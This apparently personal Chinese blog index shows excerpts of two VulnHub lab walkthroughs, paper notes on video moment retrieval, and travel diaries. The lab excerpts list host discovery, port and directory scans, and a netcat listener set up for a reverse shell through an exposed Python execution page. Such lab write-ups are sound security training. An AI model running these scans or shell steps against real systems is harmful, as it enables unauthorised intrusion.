西风の小屋

靶机地址：https://download.vulnhub.com/admx/AdmX_new.7z 信息搜集及主机发现主机发现nmap -sn 192.168.40.0/24 netdiscover -r 192.168.40.0/24 这里再记录一工具arping，相较于arp-scan它范围更广，配合简单的bash使用。 for i in $(seq 1 256);do sudo arping -c 1 192.168.40.$i;done kali:192.168.40.148 靶机：192.168.40.150 信息搜集靶机端口、服务、操作系统探测nmap -sV -p- -O 192.168.40.150 主机只开放了80端口，访问后为apache的默认配置界面。 目录爆破dirsearch -u 192.168.40.150:80 80端口下存在/wordpress 以及该目录下的wp-login.php 再对/wordpress目录进行扫描，发现存在大量子目录，包含疑似管理页面wp-admin 尝试访问wp-admin，发现存在一些重定向操作和一个不存在的ip ...

论文原标题: Lei J , Berg T L , Bansal M .MTVR: Multilingual Moment Retrieval in Videos[J]. 2021.DOI:10.48550/arXiv.2108.00061. 源码：https://github.com/jayleicn/mTVRetrieval 摘要及引言：采用数据集MTVR：一种在TVR数据集的基础上增加了相应的中文查询和标题，包含了对21.8K条视频的218K条英语和中文的查询，是最大的视频检索数据集，且支持对话检索（以字幕的形式）。 提出了mXML：一个支持双语言的多片段检索模型，它通过参数共享和限制语言邻域在数据集上执行操作和训练。在XML（by Lei，2020）的基础上加入了参数共享（by Sachan and Neubig，2018；Dong，2015）使得两个语言可以用统一的解码器解码。引入语言邻域限制（by Wang，2018；Kim，2020）到查询输出和字幕嵌入，使得语义相同的不同语言的两句话在嵌入位置上更加相近。 文章首先指出了当前研究的不足之处：仅仅面向单一语言（英语），且不 ...

靶机下载地址：https://download.vulnhub.com/boredhackerblog/medium_socnet.ova 主机探测arp-scan -l nmap -sn 192.168.40.0/16 kali：192.168.40.148 靶机：192.168.40.149 开始时没能使用工具扫描到靶机ip，最后才发现是因为VMware默认采用了桥接模式而非ＮＡＴ模式将其接入网络。 进一步信息收集1.端口、服务、操作系统探测nmap -sV -sC -O 192.168.40.149 目标开放了22、5000端口，在5000端口运行了一个由python2编写的http服务“Werkzeug”。在按照提示输入少于4字符长度的信息时会提示输入不够长 2.目录扫描dirsearch -u 192.168.40.149：5000 对5000端口进行目录扫描，发现一个／admin目录，访问，内有一个可执行python代码的入口。 尝试利用1.利用python来反弹shell先在kali监听5555端口： nc -lvnp 5555 在网页执行： 123456789i ...

仓促又惊喜：我的舒适圈与毕业旅行我向来不喜欢未知的冒险。每次要出门，我总会有一堆要担心的东西，甚至只是从学校回家：睡得不好怎么办？车上有蚊子怎么办？忘拿东西怎么办？路上想上厕所没人帮忙看东西怎么办……一开始，我将这些莫名的担心归咎于过于紧绷的谨慎，但后来发现，我只是不愿意踏出自己给自己设定的舒适圈罢了。 本次出行的目的地是江浙。出发前一天，我仓促地告别了101，在朋友家里借宿一晚。第一次独自出远门旅行，就和预想的一样，我又开始了莫名其妙的担心，遂拉人聊天。 不得不说，凡事只要迈出第一步，剩下的路走起来似乎也没那么颠簸——毕竟也没回退的权力了。接下来便是我的囧途：许久未坐过飞机，于是在机场不停问工作人员一些十几岁孩子会问的问题；本想在飞机上打盹，却发现局促的空间连我的腿都不可摆正，于是看书打发时间（临别前某室友送的，南非作家的小说《耻》）；由于飞机晚点，差点误了下一程班车，在温州38度的高温中狂奔寻找汽车站（浙江本地人把长途车站称为远途车站？开始听到这个名词还愣了好一会哈哈哈哈哈哈哈）。 在阔别14年的老家玉环，多数我所担心过的问题都没有出现过。亲友们都很热情，带我吃了海鲜，喝了青草 ...

文章信息：Zhang Z , Lin Z , Zhao Z ,et al.Cross-Modal Interaction Networks for Query-Based Moment Retrieval in Videos[J].ACM, 2019.DOI:10.1145/3331184.3331235. 源码： https://github.com/ikuinen/CMIN 引言部分对标题【跨模型】的解释要从一个连续的复杂的视频中定位出一小段特定的片段要比从已定义的集和中找出一个视频要困难的多。在下图所示的例子中,一个句子包含了两个连续的动作，对应了视频中的两段内容。因此正确的视频内容检索需要理解视频以及查询内容，二者缺一不可。这点就需要跨模形（cross-modal）的支持。 本文对高质量视频检索的考虑首先查询内容通常包含了因果时间上的行为，因此学习细粒度查询表示就很重要。目前的方法使用循环神经网络（如GRU）来理解查询语句语义，但它们通常无法顾及句法结构。 本文所采用的是图卷积网络（GCN，Graph convolution network）来处理查询的句法结构，具体说就说如 ...

文章信息：Cui R , Qian T , Peng P ,et al.Video Moment Retrieval from Text Queries via Single Frame Annotation[J].2022.DOI:10.48550/arXiv.2204.09409. VMR视频片段检索（ video moment retrieval，VMR），旨在根据一段自然语言的描述在未修饰的视频中寻找对应的片段，也称视频定位（localization）或视频挖掘（video grounding）[渣翻]。不同于传统的视频动作定位（Video action localization，VAL），VMR的定位目标延展为自然语言而非预定义的行为类别，其应用场景可以有视频浏览网站和语义视频搜索引擎。 “一眼标”（glance annotation）fully supervised VMR在构造强监督的VMR数据集时，可以用四元组来表述(V,Q,st,ed): V：视频 Q：查询语句 st：片段开始时间 ed：片段结束时间 这种描述要求数据集构造者先提供视频片段（需要确切的开始和结束时间 ...

说走就走！“离毕业还有二十多天啊，去干什么呢？” “要出去玩吗？” “好啊，去哪？” “要不去重庆吧！” “好，下周就走！” 出行的决定和准备都十分仓促，在对整个寝室的轮番询问后，凑出了三人小分队。三人没来得及买零食、没来得及收拾行李、没来得及缓存路上解闷用的电影，包里装着一套换洗衣物、一个充电宝、一把雨伞——对于常年窝在成都空调房内的大四学生来说，这倒也正常。于是，被人潮（是的，虽然是高考前两天出发的，但出行人流量绝对不少）裹挟着，仨青年出发了。 行！绝大多数旅行攻略中都将重庆描述为“8D”城市，我虽有足够的心理预备，但还是承受了巨量不停爬坡下坡再爬坡的疲惫。在我去过的中华城市中，重庆最接近“赛博朋克”的“夜之城”——处处都是由直耸入云的高楼，缀以在其中穿行的轻轨轨道。嚎嚎表示，身处高楼的森林中，竟有了一种眩晕感，而要说遗憾，那就是此行到陌生的城市，第一印象竟然不是包容的安全感。 在成都步行的心得只有一句话：应该提前做好路线规划。否则就请设想：当你从李子坝费劲力气打算爬到鹅岭公园，却在半途看到了这样的提示 我们的体验非常真实——那是一种想暴打带路人的冲动，而带路人也这 ...

“他从不恶毒”“初从文，三年不中；后习武，校场发一矢，中鼓吏，逐之出；遂学医，有所成。自撰一良方，服之，卒。” 正如剧中所塑造的那样，《我的团长我的团》老兽医的形象便是如此：儿子被战争卷进深渊，自己也未能幸免；作为炮灰团里唯一的军医，却能把脚气治到截肢，这兴许也是外号兽医的原由。可即使如此，这位兽医始终想着要帮助别人，“他从不恶毒”，他的手也是战火年代战士在临死前想要握住的那双苍老却温暖的那双手。《笑林广记》的那则笑话被拿来比喻兽医这一角色，可谓是恶毒至极。无论什么时候，善良纯粹的人总是很容易让人印象深刻，演员罗京民先生的出色技巧更是赋予了这个角色的生命力。 一次意外的出行等啊等，终于等到终日处于忙碌状态的洋葱头先生决定出门走走的这天，却因为没有带身份证/没有预约错过了参观成都自然博物馆的机会，遂决定去其它地方走走，走着走着就到了东郊记忆，看了二仙桥和成华大道，吃了火鸡面烤冷面。 称本次出行意外，原因有二：一是洋葱头先生终于决定出门走走，二是出门前我还在考虑是否应该带上身份证，最终的决定是不带。 临近毕业，有些情绪才刚刚有了萌芽的意头：我还没有找到爱上这里的理由，就要结束 ...

稀里糊涂的“五一”今年五一长假绝对会迎来一波报复性旅游。这一点在成都体现得极具代表性，微博热搜五个里三个都是关于成都的。我没有那个顺大流的勇气，遂计划在成都老老实实度过旅游旺季。而事实上我也没机会游山玩水，五一长假的前三天都在和论文检测系统斗智斗勇 五一前一晚，大雨。天气似乎和文旅部商量好一样，给成都带来了一点降温的甘霖。大家陆陆续续离校去其他地方旅游，学校里已经没什么人了。从实验室出来回宿舍的路上像极了半年前大部分同学都提前回家，而考验人继续留校备考考研的时候。 但我妈妈绝对是个有勇气的人，她在出行旅游的旺季还是决定来成都找儿子啦！去成都西站接她~ 唯有遗忘是最漫长吃了一个老朋友的安利，用将近两个月的时间玩通关了游戏《spirit farer》（肝是真的肝啊）。游戏主题为离别，但展开方式更为理性，如果游戏主角不与自己的老朋友们分别，游戏进度是无法正常进行下去的。很多人将游戏背景中朋友们的离去视作永别，但一个b站的up则将它解读为另一种场景：朋友们的离去仅仅代表着主角对这个朋友的记忆到达了尽头，事实上这些朋友们从未走远，而是化作星辰继续存留下去。 通关后体验就一句话：死亡不是终点 ...